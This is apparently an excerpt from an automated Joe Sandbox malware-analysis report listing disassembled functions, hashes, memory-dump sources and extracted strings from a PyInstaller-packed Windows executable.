                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: b8e14b5e39437f3a23779871e591f8317b8e1be46d6eca35f9beed21127490c6
                                                                                                                                                                                                                                                            • Instruction ID: 2948b20c80ea5101355905d8121ab47c87280779e8b3b4974a930de4dca028a4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8e14b5e39437f3a23779871e591f8317b8e1be46d6eca35f9beed21127490c6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24319E61A196428AFB19BF158C85B78E670EF44F95F8102B9EA1D073D2CE7CE4438E31
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                                                            • Opcode ID: 1e818ce3d7a60ac953b6edb356e5c611bf03bd3223dab8e8a1ec707a6cadd3f1
                                                                                                                                                                                                                                                            • Instruction ID: 05f130ed94eaf78526e3bf20ac5885aca4897d446cfaaca7eac7e055c6fc0110
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e818ce3d7a60ac953b6edb356e5c611bf03bd3223dab8e8a1ec707a6cadd3f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81217CB2A057428EFB68AF64C840BAC77B0FF04718F854679D61E06AC5DF38D586CB60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                            • Instruction ID: 4eab4fc45c2c619bb1397272ca11f6b2d7bcbf59791332550d4098a455a68308
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02116D21A1C68289FB60BF559C01A79E3B0FF84B84F944471EB8C57686CF7DD4428F60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 5a2fd61d2380c2417d5794f115bbf4a656e75441d4a409d8b240f29f696bd49a
                                                                                                                                                                                                                                                            • Instruction ID: a0e52b25e818f4706c880be1045f5c2ee3944d1cb9d8d08b36015e9206bc8b24
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a2fd61d2380c2417d5794f115bbf4a656e75441d4a409d8b240f29f696bd49a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA21C532A18A4286FB61AF18DC40B79B7B0EF84B94F944634EA5D476D9DF3DD5028F20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: f9b91d952c5f5bbb27c286856a89106101f2e0992174c8f8af0f54b7d3c9b46c
                                                                                                                                                                                                                                                            • Instruction ID: 2a012fd6d6e00fb1e8e341d958f15f0d0cdc2c355fee5a878f7333d38a3f7a88
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9b91d952c5f5bbb27c286856a89106101f2e0992174c8f8af0f54b7d3c9b46c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F01A521A0874244FB04FB529D01869E6B5FF85FE4F9846B0EE6C57BDACE3CD5128B10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72AA8BF86,?,?,?,00007FF72AA8B147,?,?,00000000,00007FF72AA8B3E2), ref: 00007FF72AA8F78D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                            • Opcode ID: fe294415788ef69df4791d37b3f3bc23e16fbf5a99c7a053f345730c87ab0e5c
                                                                                                                                                                                                                                                            • Instruction ID: 588d185629e47d84b3e8f7b11844f6a452c85723f0b50912f8bc75bf9567ba34
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe294415788ef69df4791d37b3f3bc23e16fbf5a99c7a053f345730c87ab0e5c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5F06D18B0A6074DFF5476615D51AB9D2B0DF88B80FCC44B2C90E862D1DE2DE5838A30
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF72AA81304,?,?,?,00007FF72AA82816,?,?,?,?,?,00007FF72AA83E09), ref: 00007FF72AA8E1DA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                            • Opcode ID: f8a53f2717aa9a418a153665f15f668aef4399ea448e79edee1d71d72a1e7fd0
                                                                                                                                                                                                                                                            • Instruction ID: 8615d15f8c131aa371d6c2217a592766dce7194788043a5a92e85ae17e35f558
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8a53f2717aa9a418a153665f15f668aef4399ea448e79edee1d71d72a1e7fd0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04F0F828B096478DFB6476615D41EB6D2A0DFA47A0F8846B0ED2E866C1DE2CE5828D30
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                                                                                                                            • Opcode ID: 7e1da00ca9488ba9f8c26a1434a4c92b0e41dc958698a2dc8e9c758257d60df6
                                                                                                                                                                                                                                                            • Instruction ID: f00bde1d68b8930c0927ae3ad166ae2fe434674d41314c94437ef5a2ac6551b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e1da00ca9488ba9f8c26a1434a4c92b0e41dc958698a2dc8e9c758257d60df6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1641C516D0C68181F751AB24DD016FEA370FFA9784F849272DB8D42193EF28E6DAC720
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                            • API String ID: 190572456-4266016200
                                                                                                                                                                                                                                                            • Opcode ID: 0f541286951d05cfde1ee621bc5578c8d1597a0a29c56f9860b2b78389049273
                                                                                                                                                                                                                                                            • Instruction ID: c4d9ef6f44e8b5a973ba50a7268e280b4aa6974020d4b995f51f5a3ecad0f1d2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f541286951d05cfde1ee621bc5578c8d1597a0a29c56f9860b2b78389049273
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5912B665A4EB0391FB59BB04AC50D79A3B1EF04754FD454B6C80E062A4FF7CB68ACA60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                            • Opcode ID: ee6ddb9c22397a02ef7f89c4ae9451cd5ee51806b236cf38c383584f5dc4b0f7
                                                                                                                                                                                                                                                            • Instruction ID: e73e4907cd42938f4e2ccd63a873a2f9f9a4dcf8346680cbd24f8209bcab22c6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee6ddb9c22397a02ef7f89c4ae9451cd5ee51806b236cf38c383584f5dc4b0f7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DB2D272A182838BF7649E64DC41FFDB7B1FF44388F905175DA0A57A84DB38AA068F50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF72AA72A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA7101D), ref: 00007FF72AA78587
                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32 ref: 00007FF72AA785B6
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF72AA7860C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA729C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF72AA788E2,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA7101D), ref: 00007FF72AA729F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA729C0: MessageBoxW.USER32 ref: 00007FF72AA72AD0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                                                            • API String ID: 2920928814-2573406579
                                                                                                                                                                                                                                                            • Opcode ID: 341253ed490ea0d4c0f2cc2c63e3841e2b0994626e2ed60ed720fa43fab6ebbb
                                                                                                                                                                                                                                                            • Instruction ID: 4b9ef69ada7a1840c72661e3226abdc001dde30be07b21520de90cd646656444
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 341253ed490ea0d4c0f2cc2c63e3841e2b0994626e2ed60ed720fa43fab6ebbb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02216061A08A4396F760AF11EC44E7AE2B5FF88784FC40176D64D826A5EF3CD6468F60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                                            • Opcode ID: f0495aeca64e737fa0ff218dd5454e1fd46196f668a698fc407bc1dcdf963f54
                                                                                                                                                                                                                                                            • Instruction ID: d5480afbc93622b4afd22dda2aa302e29204b103e5121333c9dce7ea3c392371
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0495aeca64e737fa0ff218dd5454e1fd46196f668a698fc407bc1dcdf963f54
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2310076605A828AFB609F60EC40BEEB374FB84744F84407ADA4D47B95DF38D649CB14
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                                                            • Opcode ID: fd667905384e7d9d9673078d4bc89f495a5f33449598c9bf886212c96aaa5de2
                                                                                                                                                                                                                                                            • Instruction ID: 91b0120e5911f7aa38bd5df022e6a6aa27e786df772eabf8068c081336185d6b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd667905384e7d9d9673078d4bc89f495a5f33449598c9bf886212c96aaa5de2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D312F36618F818AE7609F25EC40AAEB3B4FF88754F900176EA8D43B55DF38D656CB10
                                                                                                                                                                                                                                                            Uniqueness

